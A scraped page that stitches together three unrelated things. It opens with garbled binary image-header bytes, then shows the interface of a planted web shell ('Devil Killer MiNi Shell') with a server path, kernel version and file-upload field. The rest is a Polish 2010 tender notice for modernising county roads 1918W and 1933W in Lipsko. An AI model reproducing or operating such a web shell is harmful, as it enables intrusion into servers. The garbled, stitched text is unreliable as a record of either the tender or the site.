JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100923/261377-N-2010.html

<p class="kh_header"><b>Lipsko: Odbudowa (modernizacja) dróg powiatowych nr 1918W, 1933W na terenie powiatu lipskiego (2 zadania)</b><br>
<b>Numer ogłoszenia: 261377 - 2010; data zamieszczenia: 23.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg Publicznych w Lipsku , ul. Spacerowa 24, 27-300 Lipsko, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdpl.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa (modernizacja) dróg powiatowych nr 1918W, 1933W na terenie powiatu lipskiego (2 zadania).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia w zakresie zadania nr 1 dotyczy:
Odbudowa (modernizacja) drogi powiatowej nr 1918W Solec - Boiska - Chotcza na odcinku Białobrzegi - Górki w km 8+400 - 10+425, dł. 2,025 km  Zakres robót: I. Roboty przygotowawcze 1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym - 2,025 km 2. Ścinanie drzew bez utrudnień o średnicy do 15 cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 10 km - 211 szt. 3. Ścinanie drzew bez utrudnień o średnicy do 46-55 cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 10 km - 302 szt. 4. Ścinanie drzew bez utrudnień o średnicy pow. 100 cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 10 km - 4 szt. 5. Karczowanie krzaków i podszycia ilości sztuk krzaków 1000/ha - 0,222 ha II. Odwodnienie korpusu drogowego 6. Wykonanie ścianek czołowych przepustów średnicy 60 cm wraz z wykonaniem deskowania, zbrojenia i izolacji ścian lepikiem szt. 4  - 3,6 m3 7. Przepusty prefabrykowane z rur żelbetowych. Wykonywanie części przelotowej prefabrykowanych przepustów drogowych rurowych jednootworowych, która składa się z ławy fundamentowej z betonu, rur żelbetowych średnicy 60cm, izolacja styków rur papą i lepikiem szt. 2 - 14,0 m III. Roboty ziemne- nasypy 8. Wykonanie wykopów mechanicznie w gruncie  kat. I-II z transportem urobku na nasyp samochodami na odl. 1 km wraz z zagęszczeniem gruntów w nasypie i zwilżenie w miarę potrzeby warstw zagęszczanych wodą - 5596 m3 9. Wykonanie nasypów mechanicznie z gruntu kat I-II z transportem urobku na nasyp samochodami do od 1 km wraz z formowaniem i zagęszczaniem nasypu i zwilżeniem w miarę potrzeby warstw zagęszczonych wodą  - 420 m3  IV. Podbudowy 10. Koryto wykonane na całej szerokości nawierzchni  jezdni mechanicznie w gruncie kat. I-II gł. 30 cm - 8505 m2 11.Wykonanie i zagęszczanie warstwy z piasku w korycie lub na całej szerokości drogi mechanicznie gr. warstwy 10 cm  - 8505 m2 12. Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni przy użyciu równiarki samojezdnej i walca - 8505 m2 13. Wykonanie podbudowy z kruszywa naturalnego, warstwa dolna gr. 20 cm  - 8505 m2 14. Wykonanie podbudowy z kruszywa naturalnego, warstwa górna  gr. 8 cm  - 8505 m2 V. Nawierzchnie 15. Wykonanie warstwy wiążącej z mieszanki mineralno-asfaltowej dla ruchu KR ?, gr. 4 cm, szer.4,10 m - 8302 m2 16. Mechaniczne wykonanie warstwy ścieralnej gr. 3 cm z masy mineralno-asfaltowej dla ruchu KR-1/2,  szer. 4,00 m - 8100 m2 VI. Roboty wykończeniowe i towarzyszące 17.Wzmocnienie poboczy materiałem kamiennym grubość warstwy do 10 cm, szer. 0,50 m - 2025 m2 18. Uzupełnianie i wyprofilowanie poboczy gruntowych do 10 cm szer. 0, 50 m - 2025  m2    
2 Przedmiot zamówienia w zakresie zadania nr 2 dotyczy:
Odbudowa (modernizacja) drogi powiatowej nr 1933W Sadkowice - Kępa Piotrawińska - Pawłowice w km 0+020 - 7+170, dł. 7,150 km
Zakres robót: I. Roboty przygotowawcze 1. Rozbieranie nawierzchni z mas mineralno - bitumicznych gr. warstwy 4cm - 225,0 m2 2. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym - 7,150 km II. Podbudowy  3. Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno-asfaltową w ilości śr. 50 kg/m2 (śr. gr. 2 cm) - 1608 ton 4. Mechaniczne wykonanie warstwy ścieralnej gr. 4 cm   z masy mineralno-asfaltowej dla ruchu KR-1/2 - 32395,0 m2 IV Roboty wykończeniowe i towarzyszące 5. Uzupełnianie i wyprofilowanie poboczy gruntowych do 10 cm szer. 1, 25 m - 17875,0 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.26.00-1, 45.23.31.00-0, 45.23.31.00-2, 45.23.31.40-2, 45.23.31.42-6, 45.23.33.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Ustala się wadium w zakresie poszczególnych zadań od 1 do 2 w wysokości: 
dla zadania nr 1 w wysokości:  17 000,00 zł, słownie: siedemnaście tysięcy złotych 00/100   
dla zadania nr 2 w wysokości:  25 000,00 zł, słownie: dwadzieścia pięć tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej   dwóch robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wymienione roboty w swoim zakresie rzeczowym muszą zawierać budowę lub przebudowę drogi o łącznej długości 2 km. Łączna wartość każdej z wykonanych robót nie może być mniejsza niż 800 000 złotych, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę:  W zakresie dysponowanie odpowiednim potencjałem technicznym w zakresie następującego sprzętu i urządzeń spełniających minimalne wymagania sprzętowe i ilościowe: 
dla zadania nr 1:
- równiarka drogowa (moc silnika 160 KM, szerokość lemiesza 360 cm, wyposażona dodatkowo w zrywak) - 1 szt. 
- koparka podsiębierna (pojemność łyżki powyżej 0,3 m3) - 1 szt. 
- rozkładarka mas bitumicznych (sterowana elektronicznie, szerokość układania 5,5 m)-1 szt. 
- samochód samowyładowczy (ładowność 6 ton) - 2 szt. 
- walec stalowy gładki - wibracyjny (masa własna 9 ton, szerokość robocza 1,5 m, bębny dwudzielne) - 1 szt. 
- walec gumowy statyczny (masa operacyjna 8,5 ton, szerokość robocza 1,5 m centralne pompowanie kół) - 1 szt. 
- skrapiarka do asfaltu - 1 szt. 
- wytwórnia mas bitumicznych o wydajności roboczej min 30 M g/h - 1 szt.  
dla zadania nr 2:
- frezarka - 1 szt
- równiarka drogowa (moc silnika 160 KM, szerokość lemiesza 360 cm, wyposażona dodatkowo w zrywak) - 1 szt. 
- koparka podsiębierna (pojemność łyżki powyżej 0,3 m3) - 1 szt. 
- rozkładarka mas bitumicznych (sterowana elektronicznie, szerokość układania 5,5 m)-1 szt. 
- samochód samowyładowczy (ładowność 6 ton) - 2 szt. 
- walec stalowy gładki - wibracyjny (masa własna 9 ton, szerokość robocza 1,5 m, bębny dwudzielne) - 1 szt. 
- walec gumowy statyczny (masa operacyjna 8,5 ton, szerokość robocza 1,5 m centralne pompowanie kół) - 1 szt. 
- skrapiarka do asfaltu - 1 szt. 
- wytwórnia mas bitumicznych o wydajności roboczej min 30 Mg/h - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami, Wykonawca wykaże, że dysponuje lub będzie dysponował: 
1. Kierownikiem Budowy: - minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy, - uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej (ustawa z dnia 7 lipca 1994 r. Prawo budowlane Dz. U. z 2003 r. Nr 207 poz. 2016 z późn. zm.) - wpis na listę członków właściwej izby samorządu zawodowego potwierdzony zaświadczeniem wydanym przez tę izbę z określonym terminem ważności. 
2. Kierownikiem robót drogowych: - minimum 3 letnie doświadczenie zawodowe przy realizacji robót drogowych,  uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej, - wpis na listę członków właściwej izby samorządu zawodowego potwierdzony zaświadczeniem wydanym przez tę izbę z określonym terminem ważności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Informacje o posiadanym laboratorium drogowym. W przypadku braku laboratorium drogowego, informacja o podmiocie wykonującym badania drogowe na zlecenie wykonawcy</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę 2.Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą całkowitą cenę zamówienia 3.Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych 4. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych 5. Wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie zobowiązań umowy
6. Wzór umowy - parafowany przez wykonawcę.
7. Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych. 8. Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdpl.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego adres jak w pkt.1. Na wniosek Wykonawcy Zamawiający prześle S.I.W.Z. za zaliczeniem pocztowym. Opłata za udostępnienie specyfikacji wynosi 50 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2010 godzina 09:45, miejsce: w siedzibie zamawiającego Powiatowy Zarząd Dróg Publicznych  ul. Spacerowa 24  27-300  Lipsko. Pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 11.11.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbudowa (modernizacja) drogi powiatowej nr 1918W Solec - Boiska - Chotcza na odcinku Białobrzegi - Górki w km 8+400 - 10+425, dł. 2,025 km.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót: I. Roboty przygotowawcze 1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym - 2,025 km 2. Ścinanie drzew bez utrudnień o średnicy do 15 cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 10 km - 211 szt. 3. Ścinanie drzew bez utrudnień o średnicy do 46-55 cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 10 km - 302 szt. 4. Ścinanie drzew bez utrudnień o średnicy pow. 100 cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 10 km - 4 szt. 5. Karczowanie krzaków i podszycia ilości sztuk krzaków 1000/ha - 0,222 ha II. Odwodnienie korpusu drogowego 6. Wykonanie ścianek czołowych przepustów średnicy 60 cm wraz z wykonaniem deskowania, zbrojenia i izolacji ścian lepikiem szt. 4  - 3,6 m3 7. Przepusty prefabrykowane z rur żelbetowych. Wykonywanie części przelotowej prefabrykowanych przepustów drogowych rurowych jednootworowych, która składa się z ławy fundamentowej z betonu, rur żelbetowych średnicy 60cm, izolacja styków rur papą i lepikiem szt. 2 - 14,0 m III. Roboty ziemne- nasypy 8. Wykonanie wykopów mechanicznie w gruncie  kat. I-II z transportem urobku na nasyp samochodami na odl. 1 km wraz z zagęszczeniem gruntów w nasypie i zwilżenie w miarę potrzeby warstw zagęszczanych wodą - 5596 m3 9. Wykonanie nasypów mechanicznie z gruntu kat I-II z transportem urobku na nasyp samochodami do od 1 km wraz z formowaniem i zagęszczaniem nasypu i zwilżeniem w miarę potrzeby warstw zagęszczonych wodą  - 420 m3  IV. Podbudowy 10. Koryto wykonane na całej szerokości nawierzchni  jezdni mechanicznie w gruncie kat. I-II gł. 30 cm - 8505 m2 11.Wykonanie i zagęszczanie warstwy z piasku w korycie lub na całej szerokości drogi mechanicznie gr. warstwy 10 cm  - 8505 m2 12. Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni przy użyciu równiarki samojezdnej i walca - 8505 m2 13. Wykonanie podbudowy z kruszywa naturalnego, 